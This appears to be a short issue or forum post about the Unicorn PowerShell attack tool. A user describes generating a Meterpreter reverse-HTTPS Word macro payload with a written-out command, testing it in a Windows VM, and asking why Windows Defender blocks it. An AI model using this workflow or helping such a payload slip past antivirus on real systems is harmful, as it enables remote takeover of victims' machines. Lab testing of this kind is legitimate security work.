Unicorn is a simple tool for using a PowerShell downgrade attack and injecting shellcode straight into memory. Based on Matthew Graeber's PowerShell attacks and the PowerShell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
Thank you for putting the time and effort into making this powerful tool. I just tried this out today with a Kali VM and a Windows 10 VM. The Windows VM has full Windows Defender options on.
On the Kali VM, I ran:
python3 unicorn.py windows/meterpreter/reverse_https 8080 macro
Then, I cat powershell_attack.txt and pasted the output (having replaced Auto_Open with AutoOpen) to my Windows VM Word macro.
As soon as I hit Ctrl+S, the machine warns of the virus and prevents the macro from being saved.
I don't really know what could be the causes for the problem. Any help would be appreciated. Thank you in advance!